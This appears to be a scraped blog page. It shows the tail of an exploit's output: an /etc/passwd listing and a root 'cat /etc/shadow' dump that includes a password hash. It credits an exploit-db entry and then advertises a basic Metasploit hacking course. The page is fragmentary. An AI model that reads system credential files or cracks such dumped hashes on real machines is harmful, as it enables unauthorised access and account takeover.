gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
avahi-autoipd:x:103:106:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
whoopsie:x:105:110::/nonexistent:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
colord:x:109:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
lightdm:x:110:118:Light Display Manager:/var/lib/lightdm:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
hplip:x:112:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:113:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
saned:x:114:123::/home/saned:/bin/false
kdm:x:115:65534::/home/kdm:/bin/false
test:x:1000:1000:test,,,:/home/test:/bin/bash
 # cat /etc/shadow
 root:!:15651:0:99999:7:::
daemon:*:15630:0:99999:7:::
bin:*:15630:0:99999:7:::
sys:*:15630:0:99999:7:::
sync:*:15630:0:99999:7:::
games:*:15630:0:99999:7:::
man:*:15630:0:99999:7:::
lp:*:15630:0:99999:7:::
mail:*:15630:0:99999:7:::
news:*:15630:0:99999:7:::
uucp:*:15630:0:99999:7:::
proxy:*:15630:0:99999:7:::
www-data:*:15630:0:99999:7:::
backup:*:15630:0:99999:7:::
list:*:15630:0:99999:7:::
irc:*:15630:0:99999:7:::
gnats:*:15630:0:99999:7:::
nobody:*:15630:0:99999:7:::
libuuid:!:15630:0:99999:7:::
syslog:*:15630:0:99999:7:::
messagebus:*:15630:0:99999:7:::
avahi-autoipd:*:15630:0:99999:7:::
usbmux:*:15630:0:99999:7:::
whoopsie:*:15630:0:99999:7:::
kernoops:*:15630:0:99999:7:::
rtkit:*:15630:0:99999:7:::
colord:*:15630:0:99999:7:::
lightdm:*:15630:0:99999:7:::
avahi:*:15630:0:99999:7:::
hplip:*:15630:0:99999:7:::
pulse:*:15630:0:99999:7:::
saned:*:15630:0:99999:7:::
kdm:*:15650:0:99999:7:::
test:$6$aoMcNoTU$IR6Ug3SthKdI4.ixdwf9rsIRsdz.4OACiabhaoxdd0NoYbjvxa9I.dj7VF7U4OaB7Oy2gDezCXL/oQx9riRXP0:15651:0:99999:7:::


This is really great !

Source: http://www.exploit-db.com/exploits/24746/

Metasploit Training!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

METASPLOIT TRAINING

My friend providing metasploit basic training for newbie. If you are new to metasploit and want to have some knowledge about metasploit then you can take this course. Remember it is not professional course!

Main:
1. Fundamental (The Basic).
2. Information Gathering ( First and important step of a hacker).
3. Usage of powerful Auxiliary module and finding vulnerability ( Powerful hacking tools).
4. Exploit specific vulnerability using( What vulnerability we are going to exploit?).
5. Hacking windows xp-7( Hack windows XP to Windows 7).
6. Exploit development using custom Metasploit and python(Found 0day but where the shellcode?).
7. Post Exploitation(Got accessed but now what?).

Read Full Article